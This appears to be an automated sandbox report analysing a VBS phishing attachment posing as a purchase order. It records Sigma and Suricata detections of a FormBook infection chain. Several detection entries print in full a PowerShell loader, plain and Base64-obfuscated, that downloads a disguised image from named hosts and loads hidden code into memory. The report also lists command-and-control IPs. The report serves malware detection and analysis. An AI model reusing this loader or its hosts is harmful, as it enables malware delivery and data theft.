        Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$ZgBn$Gs$ZgBn$Gg$Zg$v$HM$ZwBz$GQ$ZwBo$HM$Z$Bm$HM$LwBk$G8$dwBu$Gw$bwBh$GQ$cw$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$/$DE$Mw$0$DE$NQ$n$Cw$I$$n$Gg$d$B0$H$$Og$v$C8$MQ$w$DM$Lg$y$D$$Lg$x$D$$Mg$u$DY$Mg$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bi$GE$cwBl$DY$N$BM$GU$bgBn$HQ$a$$g$D0$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I
        Sigma detected: WScript or CScript Dropper
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-DC13112024_pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-DC13112024_pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-DC13112024_pdf.vbs", ProcessId: 3676, ProcessName: wscript.exe
        Sigma detected: Usage Of Web Request Commands And Cmdlets
        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jfgkfghf/sgsdghsdfs/downloads/new_img.jpg?13415', 'http://103.20.102.62/new_img.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.cbokidj/niam/sdaeh/sfer/ina/312eihcir/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jfgkfghf/sgsdghsdfs/downloads/new_img.jpg?13415', 'http://103.20.102.62/new_img.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.cbokidj/niam/sdaeh/sfer
        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-DC13112024_pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-DC13112024_pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-DC13112024_pdf.vbs", ProcessId: 3676, ProcessName: wscript.exe
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$ZgBn$Gs$ZgBn$Gg$Zg$v$HM$ZwBz$GQ$ZwBo$HM$Z$Bm$HM$LwBk$G8$dwBu$Gw$bwBh$GQ$cw$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$/$DE$Mw$0$DE$NQ$n$Cw$I$$n$Gg$d$B0$H$$Og$v$C8$MQ$w$DM$Lg$y$D$$Lg$x$D$$Mg$u$DY$Mg$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bi$GE$cwBl$DY$N$BM$GU$bgBn$HQ$a$$g$D0$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I

        Data Obfuscation

        barindex
        Sigma detected: Powershell download and load assembly
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jfgkfghf/sgsdghsdfs/downloads/new_img.jpg?13415', 'http://103.20.102.62/new_img.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.cbokidj/niam/sdaeh/sfer/ina/312eihcir/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jfgkfghf/sgsdghsdfs/downloads/new_img.jpg?13415', 'http://103.20.102.62/new_img.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.cbokidj/niam/sdaeh/sfer

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-14T08:15:50.576994+010020229301A Network Trojan was detected4.175.87.197443192.168.2.549732TCP
        2024-11-14T08:16:13.926913+010020229301A Network Trojan was detected20.109.210.53443192.168.2.563373TCP
        2024-11-14T08:16:15.332037+010020229301A Network Trojan was detected20.109.210.53443192.168.2.563381TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-14T08:15:37.553182+010020477501A Network Trojan was detected103.20.102.6280192.168.2.549704TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-14T08:16:22.358617+010020507451Malware Command and Control Activity Detected192.168.2.563422199.59.243.22780TCP
        2024-11-14T08:16:54.529953+010020507451Malware Command and Control Activity Detected192.168.2.563490156.232.181.15580TCP
        2024-11-14T08:17:09.686592+010020507451Malware Command and Control Activity Detected192.168.2.563494101.35.209.18380TCP
        2024-11-14T08:17:24.177140+010020507451Malware Command and Control Activity Detected192.168.2.563498203.161.46.20580TCP
        2024-11-14T08:17:37.893093+010020507451Malware Command and Control Activity Detected192.168.2.563502161.97.142.14480TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-14T08:15:37.556209+010020490381A Network Trojan was detected103.20.102.6280192.168.2.549704TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-14T08:16:22.358617+010028554651A Network Trojan was detected192.168.2.563422199.59.243.22780TCP
        2024-11-14T08:16:54.529953+010028554651A Network Trojan was detected192.168.2.563490156.232.181.15580TCP
        2024-11-14T08:17:09.686592+010028554651A Network Trojan was detected192.168.2.563494101.35.209.18380TCP
        2024-11-14T08:17:24.177140+010028554651A Network Trojan was detected192.168.2.563498203.161.46.20580TCP
        2024-11-14T08:17:37.893093+010028554651A Network Trojan was detected192.168.2.563502161.97.142.14480TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-14T08:16:47.405053+010028554641A Network Trojan was detected192.168.2.563487156.232.181.15580TCP
        2024-11-14T08:16:49.952180+010028554641A Network Trojan was detected192.168.2.563488156.232.181.15580TCP
        2024-11-14T08:16:52.498929+010028554641A Network Trojan was detected192.168.2.563489156.232.181.15580TCP
        2024-11-14T08:17:02.561483+010028554641A Network Trojan was detected192.168.2.563491101.35.209.18380TCP
        2024-11-14T08:17:04.592653+010028554641A Network Trojan was detected192.168.2.563492101.35.209.18380TCP
        2024-11-14T08:17:07.373936+010028554641A Network Trojan was detected192.168.2.563493101.35.209.18380TCP
        2024-11-14T08:17:16.548482+010028554641A Network Trojan was detected192.168.2.563495203.161.46.20580TCP
        2024-11-14T08:17:19.096313+010028554641A Network Trojan was detected192.168.2.563496203.161.46.20580TCP
        2024-11-14T08:17:21.645493+010028554641A Network Trojan was detected192.168.2.563497203.161.46.20580TCP
        2024-11-14T08:17:30.229642+010028554641A Network Trojan was detected192.168.2.563499161.97.142.14480TCP
        2024-11-14T08:17:32.780060+010028554641A Network Trojan was detected192.168.2.563500161.97.142.14480TCP
        2024-11-14T08:17:35.345872+010028554641A Network Trojan was detected192.168.2.563501161.97.142.14480TCP
        2024-11-14T08:17:45.124379+010028554641A Network Trojan was detected192.168.2.56350343.155.76.12480TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-14T08:15:41.182915+010028582951A Network Trojan was detected185.199.111.133443192.168.2.549705TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: PO-DC13112024_pdf.vbsVirustotal: Detection: 9%Perma Link
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:49705 version: TLS 1.2
        Source: Binary string: where.pdbGCTL source: RegAsm.exe, 00000005.00000002.2489670846.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, WKOyCvoOlM.exe, 00000007.00000003.2662569377.0000000000ECB000.00000004.00000001.00020000.00000000.sdmp, WKOyCvoOlM.exe, 00000007.00000002.3403960085.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: where.pdb source: RegAsm.exe, 00000005.00000002.2489670846.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, WKOyCvoOlM.exe, 00000007.00000003.2662569377.0000000000ECB000.00000004.00000001.00020000.00000000.sdmp, WKOyCvoOlM.exe, 00000007.00000002.3403960085.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WKOyCvoOlM.exe, 00000007.00000002.3403075765.00000000000BE000.00000002.00000001.01000000.00000007.sdmp, WKOyCvoOlM.exe, 0000000A.00000002.3403074648.00000000000BE000.00000002.00000001.01000000.00000007.sdmp
        Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, where.exe, 00000008.00000002.3405002223.0000000004940000.00000040.00001000.00020000.00000000.sdmp, where.exe, 00000008.00000003.2483618951.000000000479A000.00000004.00000020.00020000.00000000.sdmp, where.exe, 00000008.00000003.2480888142.00000000045E9000.00000004.00000020.00020000.00000000.sdmp, where.exe, 00000008.00000002.3405002223.0000000004ADE000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: RegAsm.pdb source: where.exe, 00000008.00000002.3403339543.00000000028B5000.00000004.00000020.00020000.00000000.sdmp, where.exe, 00000008.00000002.3405546672.0000000004F6C000.00000004.10000000.00040000.00000000.sdmp, WKOyCvoOlM.exe, 0000000A.00000000.2559847193.00000000029CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2782973347.000000000B3BC000.00000004.80000000.00040000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, where.exe, where.exe, 00000008.00000002.3405002223.0000000004940000.00000040.00001000.00020000.00000000.sdmp, where.exe, 00000008.00000003.2483618951.000000000479A000.00000004.00000020.00020000.00000000.sdmp, where.exe, 00000008.00000003.2480888142.00000000045E9000.00000004.00000020.00020000.00000000.sdmp, where.exe, 00000008.00000002.3405002223.0000000004ADE000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: RegAsm.pdb4 source: where.exe, 00000008.00000002.3403339543.00000000028B5000.00000004.00000020.00020000.00000000.sdmp, where.exe, 00000008.00000002.3405546672.0000000004F6C000.00000004.10000000.00040000.00000000.sdmp, WKOyCvoOlM.exe, 0000000A.00000000.2559847193.00000000029CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2782973347.000000000B3BC000.00000004.80000000.00040000.00000000.sdmp
        Source: Binary string: C:\Users\Administrator\source\repos\testpowershell\testpowershell\obj\Debug\testpowershell.pdb source: powershell.exe, 00000004.00000002.2244616127.00000127D3BDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244534059.00000127CEBE0000.00000004.08000000.00040000.00000000.sdmp
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0079C990 FindFirstFileW,FindNextFileW,FindClose,8_2_0079C990

        Software Vulnerabilities

        barindex
        Suspicious execution chain found
        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        Source: C:\Windows\SysWOW64\where.exeCode function: 4x nop then xor eax, eax8_2_00789EB0
        Source: C:\Windows\SysWOW64\where.exeCode function: 4x nop then mov ebx, 00000004h8_2_047904E8
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeCode function: 4x nop then xor eax, eax10_2_04E70EFE

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:63422 -> 199.59.243.227:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:63422 -> 199.59.243.227:80
        Source: Network trafficSuricata IDS: 2047750 - Severity 1 - ET MALWARE Base64 Encoded MZ In Image : 103.20.102.62:80 -> 192.168.2.5:49704
        Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 103.20.102.62:80 -> 192.168.2.5:49704
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63496 -> 203.161.46.205:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63499 -> 161.97.142.144:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:63502 -> 161.97.142.144:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63491 -> 101.35.209.183:80
